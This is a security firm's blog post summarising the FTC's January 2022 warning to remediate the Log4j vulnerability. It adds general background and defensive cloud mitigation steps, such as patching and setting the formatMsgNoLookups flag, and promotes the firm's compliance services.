On 4 January 2022, the FTC published a blog post to their website warning organizations to remediate Log4j vulnerabilities found in their system as soon as possible. The FTC warns organizations of the consequences of ignoring this vulnerability, including loss of personal information, financial loss, and other irreversible impacts. The FTC goes on to remind organizations that under the Federal Trade Commission Act and the Gramm Leach Bliley Act, organizations are compelled to remediate known vulnerabilities. Certainly, there are other compelling regulations such as the FTC Safeguards Rule for non-banking financial institutions that require organizations to act on known vulnerabilities.
The FTC warning goes on to point to the Cybersecurity and Infrastructure Security Agency (CISA) Apache Log4j Vulnerability Guidance webpage. This guidance provides a summary of the Log4j vulnerability and helpful resources for organizations looking to respond to the vulnerability. CISA encourages those affected to report any compromises to both the FBI and CISA immediately.
In the blog post, the FTC recalls the example of Equifax, who failed to patch a known vulnerability and exposed the personal data of 147 million consumers. Equifax went on to pay $700 million in fines to the federal government and all 50 states.
If your organization is not yet aware of its regulatory obligations, please visit OCD Tech’s webpage for government compliance services and learn more about the types of regulations that might impact your organization and how OCD Tech may be able to help.
Background on the Log4j Vulnerability
A major vulnerability in the Apache function Log4j is being exploited, affecting hundreds of millions of devices. Log4j is an open-source Java component used to record users’ activities and the behavior of software for later review. A malicious actor can utilize this exploit by sending malicious code that will get logged by Log4j, potentially allowing the attacker to take over the device or infect it with malware. Attackers taking advantage of the vulnerability have used it to deploy crypto-miners, botnets, and ransomware.
After the vulnerability was officially announced on 10 December 2021, attacks began to increase significantly. The vulnerability is believed to have been in the wild since the beginning of December and is expected to have a lasting impact across the internet for years. What makes this vulnerability particularly dangerous is the large number of applications that incorporate Log4j. Often, unexpected applications contain the component, and many third parties may not even be aware they are using it, which serves to slow down patching efforts.
Major tech companies and cloud providers like Apple, Amazon, IBM, and Google acknowledged that some of their services were susceptible to this exploit. In cloud environments, it is imperative to understand that an attacker gaining access to a host can escalate to access of all the identities owned by the host. The potential for data breaches from the Log4j exploit is high, which should make users of cloud products wary If you contract Software as a Service or run a cloud vendor product from a web interface, it is recommended that they be contacted for more information, including an update on how they are handling the vulnerability.
Here are a few steps to ensure your cloud environment is secure:
- Prioritize patching based on the criticality of resources that are necessary for daily function
- Until patches are applied, set log4j2.formatMsgNoLookups to true by adding -Dlog4j2.formatMsgNoLookups=True to the Java Virtual Machine command for starting your application (for versions 2.10 and above)
- Utilize application tagging capabilities to identify unpatched applications for more strict access policies
- Enable multifactor authentication to prevent compromised accounts from being tested
- Restrict access of resources to trusted locations only
- Run vulnerability scans with the most recent signatures
- Utilize threat hunting and logging tools to look at historical data and determine if exploitation was attempted
Without a comprehensive overview of all the programs on a network, it is difficult to track these unsecure devices down. Fortunately, the remote code execution exploit is already patched in the latest Log4j update, which should be applied immediately. Numerous vendor specific mitigation recommendations are available and should be followed.
Click here to learn more about our FTC Safeguards Virtual CISO.
